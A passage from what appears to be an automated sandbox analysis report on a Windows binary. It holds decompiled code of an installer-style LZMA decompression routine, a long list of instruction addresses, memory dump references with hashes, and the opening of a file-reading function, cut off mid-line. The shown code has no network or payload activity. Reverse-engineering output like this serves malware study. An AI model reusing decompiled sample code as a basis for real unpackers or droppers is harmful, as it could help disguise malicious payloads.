														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                            0x00000000
                                                                            0x00406c2e
                                                                            0x00406c2e
                                                                            0x00406c32
                                                                            0x00406c5b
                                                                            0x00406c65
                                                                            0x00406c34
                                                                            0x00406c3d
                                                                            0x00406c4a
                                                                            0x00406c4d
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fe2
                                                                            0x00406fe6
                                                                            0x00407195
                                                                            0x004071ab
                                                                            0x004071b3
                                                                            0x004071ba
                                                                            0x004071bc
                                                                            0x004071c3
                                                                            0x004071c7
                                                                            0x004071c7
                                                                            0x00406ff2
                                                                            0x00406ff9
                                                                            0x00407001
                                                                            0x00407004
                                                                            0x00407007
                                                                            0x00407007
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x00000000
                                                                            0x004067c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067cc
                                                                            0x004067cf
                                                                            0x004067d2
                                                                            0x004067d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067dc
                                                                            0x004067df
                                                                            0x004067e1
                                                                            0x004067e2
                                                                            0x004067e5
                                                                            0x004067e7
                                                                            0x004067e8
                                                                            0x004067ea
                                                                            0x004067ed
                                                                            0x004067f2
                                                                            0x004067f7
                                                                            0x00406800
                                                                            0x00406813
                                                                            0x00406816
                                                                            0x00406822
                                                                            0x0040684a
                                                                            0x0040684c
                                                                            0x0040685a
                                                                            0x0040685a
                                                                            0x0040685e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x0040684e
                                                                            0x00406851
                                                                            0x00406852
                                                                            0x00406852
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x00406828
                                                                            0x0040682d
                                                                            0x0040682d
                                                                            0x00406836
                                                                            0x0040683e
                                                                            0x00406841
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406864
                                                                            0x00406864
                                                                            0x00406868
                                                                            0x00407114
                                                                            0x00000000
                                                                            0x00407114
                                                                            0x00406871
                                                                            0x00406881
                                                                            0x00406884
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x0040688a
                                                                            0x0040688e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406890
                                                                            0x00406896
                                                                            0x004068c0
                                                                            0x004068c6
                                                                            0x004068cd
                                                                            0x00000000
                                                                            0x004068cd
                                                                            0x0040689c
                                                                            0x0040689f
                                                                            0x004068a4
                                                                            0x004068a4
                                                                            0x004068af
                                                                            0x004068b7
                                                                            0x004068ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068ff
                                                                            0x00406905
                                                                            0x00406908
                                                                            0x00406915
                                                                            0x0040691d
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068d4
                                                                            0x004068d4
                                                                            0x004068d8
                                                                            0x00407123
                                                                            0x00000000
                                                                            0x00407123
                                                                            0x004068e4
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068f2
                                                                            0x004068f5
                                                                            0x004068f8
                                                                            0x004068fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406925
                                                                            0x00406927
                                                                            0x0040692a
                                                                            0x0040699b
                                                                            0x0040699e
                                                                            0x004069a1
                                                                            0x004069a8
                                                                            0x004069b2
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x0040692c
                                                                            0x00406930
                                                                            0x00406933
                                                                            0x00406935
                                                                            0x00406938
                                                                            0x0040693b
                                                                            0x0040693d
                                                                            0x00406940
                                                                            0x00406942
                                                                            0x00406947
                                                                            0x0040694a
                                                                            0x0040694d
                                                                            0x00406951
                                                                            0x00406958
                                                                            0x0040695b
                                                                            0x00406962
                                                                            0x00406966
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x00406972
                                                                            0x00406975
                                                                            0x00406993
                                                                            0x00406995
                                                                            0x00000000
                                                                            0x00406977
                                                                            0x00406977
                                                                            0x0040697a
                                                                            0x0040697d
                                                                            0x00406980
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406985
                                                                            0x00406988
                                                                            0x0040698a
                                                                            0x0040698b
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x00406bc4
                                                                            0x00406bc8
                                                                            0x00406be6
                                                                            0x00406be9
                                                                            0x00406bf0
                                                                            0x00406bf3
                                                                            0x00406bf6
                                                                            0x00406bf9
                                                                            0x00406bfc
                                                                            0x00406bff
                                                                            0x00406c01
                                                                            0x00406c08
                                                                            0x00406c09
                                                                            0x00406c0b
                                                                            0x00406c0e
                                                                            0x00406c11
                                                                            0x00406c14
                                                                            0x00406c14
                                                                            0x00406c19
                                                                            0x00000000
                                                                            0x00406c19
                                                                            0x00406bca
                                                                            0x00406bcd
                                                                            0x00406bd0
                                                                            0x00406bda
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c71
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c7b
                                                                            0x00406c7f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c85
                                                                            0x00406c87
                                                                            0x00406c8b
                                                                            0x00406c8b
                                                                            0x00406c8e
                                                                            0x00406c92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ce2
                                                                            0x00406ce6
                                                                            0x00406ced
                                                                            0x00406cf0
                                                                            0x00406cf3
                                                                            0x00406cfd
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406ce8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d09
                                                                            0x00406d0d
                                                                            0x00406d14
                                                                            0x00406d17
                                                                            0x00406d1a
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d1d
                                                                            0x00406d20
                                                                            0x00406d23
                                                                            0x00406d23
                                                                            0x00406d26
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d2c
                                                                            0x00406d2f
                                                                            0x00406d36
                                                                            0x00406d3b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dc9
                                                                            0x00406dc9
                                                                            0x00406dcd
                                                                            0x0040716b
                                                                            0x00000000
                                                                            0x0040716b
                                                                            0x00406dd3
                                                                            0x00406dd6
                                                                            0x00406dd9
                                                                            0x00406ddd
                                                                            0x00406de0
                                                                            0x00406de6
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406deb
                                                                            0x00406dee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069be
                                                                            0x004069be
                                                                            0x004069c2
                                                                            0x0040712f
                                                                            0x00000000
                                                                            0x0040712f
                                                                            0x004069c8
                                                                            0x004069cb
                                                                            0x004069ce
                                                                            0x004069d2
                                                                            0x004069d5
                                                                            0x004069db
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069e0
                                                                            0x004069e3
                                                                            0x004069e3
                                                                            0x004069e6
                                                                            0x004069e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ef
                                                                            0x004069f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069fb
                                                                            0x004069fb
                                                                            0x004069ff
                                                                            0x00406a02
                                                                            0x00406a05
                                                                            0x00406a08
                                                                            0x00406a0b
                                                                            0x00406a0c
                                                                            0x00406a0f
                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a1a
                                                                            0x00406a1d
                                                                            0x00406a20
                                                                            0x00406a23
                                                                            0x00406a26
                                                                            0x00406a29
                                                                            0x00406a45
                                                                            0x00406a48
                                                                            0x00406a4b
                                                                            0x00406a4e
                                                                            0x00406a55
                                                                            0x00406a59
                                                                            0x00406a5b
                                                                            0x00406a5f
                                                                            0x00406a2b
                                                                            0x00406a2b
                                                                            0x00406a2f
                                                                            0x00406a37
                                                                            0x00406a3c
                                                                            0x00406a3e
                                                                            0x00406a40
                                                                            0x00406a40
                                                                            0x00406a62
                                                                            0x00406a69
                                                                            0x00406a6c
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a77
                                                                            0x00406a77
                                                                            0x00406a7b
                                                                            0x0040713b
                                                                            0x00000000
                                                                            0x0040713b
                                                                            0x00406a81
                                                                            0x00406a84
                                                                            0x00406a87
                                                                            0x00406a8b
                                                                            0x00406a8e
                                                                            0x00406a94
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a99
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406aa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406aa4
                                                                            0x00406aa7
                                                                            0x00406aaa
                                                                            0x00406aad
                                                                            0x00406ab0
                                                                            0x00406ab3
                                                                            0x00406ab6
                                                                            0x00406ab9
                                                                            0x00406abc
                                                                            0x00406abf
                                                                            0x00406ac2
                                                                            0x00406ada
                                                                            0x00406add
                                                                            0x00406ae0
                                                                            0x00406ae3
                                                                            0x00406ae3
                                                                            0x00406ae6
                                                                            0x00406aea
                                                                            0x00406aec
                                                                            0x00406ac4
                                                                            0x00406ac4
                                                                            0x00406acc
                                                                            0x00406ad1
                                                                            0x00406ad3
                                                                            0x00406ad5
                                                                            0x00406ad5
                                                                            0x00406aef
                                                                            0x00406af6
                                                                            0x00406af9
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406af9
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3b
                                                                            0x00406b3b
                                                                            0x00406b3f
                                                                            0x00407147
                                                                            0x00000000
                                                                            0x00407147
                                                                            0x00406b45
                                                                            0x00406b48
                                                                            0x00406b4b
                                                                            0x00406b4f
                                                                            0x00406b52
                                                                            0x00406b58
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5d
                                                                            0x00406b60
                                                                            0x00406b60
                                                                            0x00406b66
                                                                            0x00406b04
                                                                            0x00406b04
                                                                            0x00406b07
                                                                            0x00000000
                                                                            0x00406b07
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6b
                                                                            0x00406b6e
                                                                            0x00406b71
                                                                            0x00406b74
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b80
                                                                            0x00406b83
                                                                            0x00406b86
                                                                            0x00406b9e
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba7
                                                                            0x00406ba7
                                                                            0x00406baa
                                                                            0x00406bae
                                                                            0x00406bb0
                                                                            0x00406b88
                                                                            0x00406b88
                                                                            0x00406b90
                                                                            0x00406b95
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406bb3
                                                                            0x00406bba
                                                                            0x00406bbd
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e50
                                                                            0x00407177
                                                                            0x00000000
                                                                            0x00407177
                                                                            0x00406e56
                                                                            0x00406e59
                                                                            0x00406e5c
                                                                            0x00406e60
                                                                            0x00406e63
                                                                            0x00406e69
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c1c
                                                                            0x00406c1c
                                                                            0x00406c1f
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f5b
                                                                            0x00406f5f
                                                                            0x00406f81
                                                                            0x00406f84
                                                                            0x00406f8e
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00406f61
                                                                            0x00406f64
                                                                            0x00406f68
                                                                            0x00406f6b
                                                                            0x00406f6b
                                                                            0x00406f6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407018
                                                                            0x0040701c
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x00407041
                                                                            0x00407048
                                                                            0x0040704f
                                                                            0x0040704f
                                                                            0x00000000
                                                                            0x0040704f
                                                                            0x0040701e
                                                                            0x00407021
                                                                            0x00407024
                                                                            0x00407027
                                                                            0x0040702e
                                                                            0x00406f72
                                                                            0x00406f72
                                                                            0x00406f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407109
                                                                            0x0040710c
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d43
                                                                            0x00406d45
                                                                            0x00406d4c
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d60
                                                                            0x00406d62
                                                                            0x00406d64
                                                                            0x00406d64
                                                                            0x00406d65
                                                                            0x00406d68
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d80
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407065
                                                                            0x00407065
                                                                            0x00407069
                                                                            0x004071a1
                                                                            0x00000000
                                                                            0x004071a1
                                                                            0x0040706f
                                                                            0x00407072
                                                                            0x00407075
                                                                            0x00407079
                                                                            0x0040707c
                                                                            0x00407082
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407087
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x004070f1
                                                                            0x004070f4
                                                                            0x004070f9
                                                                            0x004070fa
                                                                            0x004070fc
                                                                            0x004070fe
                                                                            0x00407101
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00407013
                                                                            0x0040700d
                                                                            0x00407093
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x004070b1
                                                                            0x004070b4
                                                                            0x004070cd
                                                                            0x004070d0
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070da
                                                                            0x004070dc
                                                                            0x004070dc
                                                                            0x004070dd
                                                                            0x004070e0
                                                                            0x004070b6
                                                                            0x004070b6
                                                                            0x004070be
                                                                            0x004070c3
                                                                            0x004070c5
                                                                            0x004070c8
                                                                            0x004070c8
                                                                            0x004070e3
                                                                            0x004070ea
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x00406d88
                                                                            0x00406d8b
                                                                            0x00406dc1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef4
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406ef9
                                                                            0x00407183
                                                                            0x00000000
                                                                            0x00407183
                                                                            0x00406eff
                                                                            0x00406f02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00000000
                                                                            0x00406f0f
                                                                            0x00406d8d
                                                                            0x00406d8f
                                                                            0x00406d91
                                                                            0x00406d93
                                                                            0x00406d96
                                                                            0x00406d97
                                                                            0x00406d99
                                                                            0x00406d9b
                                                                            0x00406d9e
                                                                            0x00406da1
                                                                            0x00406db7
                                                                            0x00406dbc
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00406e24
                                                                            0x00406e26
                                                                            0x00406e2d
                                                                            0x00406e30
                                                                            0x00406e33
                                                                            0x00406e33
                                                                            0x00406e38
                                                                            0x00406e38
                                                                            0x00406e3a
                                                                            0x00406e3d
                                                                            0x00406e44
                                                                            0x00406e47
                                                                            0x00406e74
                                                                            0x00406e74
                                                                            0x00406e77
                                                                            0x00406e7a
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00000000
                                                                            0x00406eee
                                                                            0x00406e7c
                                                                            0x00406e82
                                                                            0x00406e85
                                                                            0x00406e88
                                                                            0x00406e8b
                                                                            0x00406e8e
                                                                            0x00406e91
                                                                            0x00406e94
                                                                            0x00406e97
                                                                            0x00406e9a
                                                                            0x00406e9d
                                                                            0x00406eb6
                                                                            0x00406eb8
                                                                            0x00406ebb
                                                                            0x00406ebc
                                                                            0x00406ebf
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec6
                                                                            0x00406ec8
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed4
                                                                            0x00406ed6
                                                                            0x00406ed6
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406edd
                                                                            0x00406e9f
                                                                            0x00406e9f
                                                                            0x00406ea7
                                                                            0x00406eac
                                                                            0x00406eae
                                                                            0x00406eb1
                                                                            0x00406eb1
                                                                            0x00406ee0
                                                                            0x00406ee7
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406dff
                                                                            0x00406e02
                                                                            0x00406e05
                                                                            0x00406e08
                                                                            0x00406e0a
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00406e1d
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b0a
                                                                            0x00406b0a
                                                                            0x00406b0e
                                                                            0x00407153
                                                                            0x00000000
                                                                            0x00407153
                                                                            0x00406b14
                                                                            0x00406b17
                                                                            0x00406b1a
                                                                            0x00406b1d
                                                                            0x00406b20
                                                                            0x00406b23
                                                                            0x00406b26
                                                                            0x00406b28
                                                                            0x00406b2b
                                                                            0x00406b2e
                                                                            0x00406b31
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c95
                                                                            0x00406c95
                                                                            0x00406c99
                                                                            0x0040715f
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x00406c9f
                                                                            0x00406ca2
                                                                            0x00406ca5
                                                                            0x00406ca8
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb6
                                                                            0x00406cb9
                                                                            0x00406cbc
                                                                            0x00406cbd
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cc2
                                                                            0x00406cc5
                                                                            0x00406cc8
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406cce
                                                                            0x00406cd0
                                                                            0x00406cd0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406cd3
                                                                            0x00406cd3
                                                                            0x00000000
                                                                            0x00406cd3
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x004071c0
                                                                            0x004071c0
                                                                            0x00000000
                                                                            0x004071c0
                                                                            0x0040700d
                                                                            0x00406f94
                                                                            0x00406f91

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                                            • Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
                                                                            • Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                                            • Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 92%
                                                                            			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4247b8;
					 *0x41f8fc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040329A(4);
				if(_t22 >= 0) {
					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
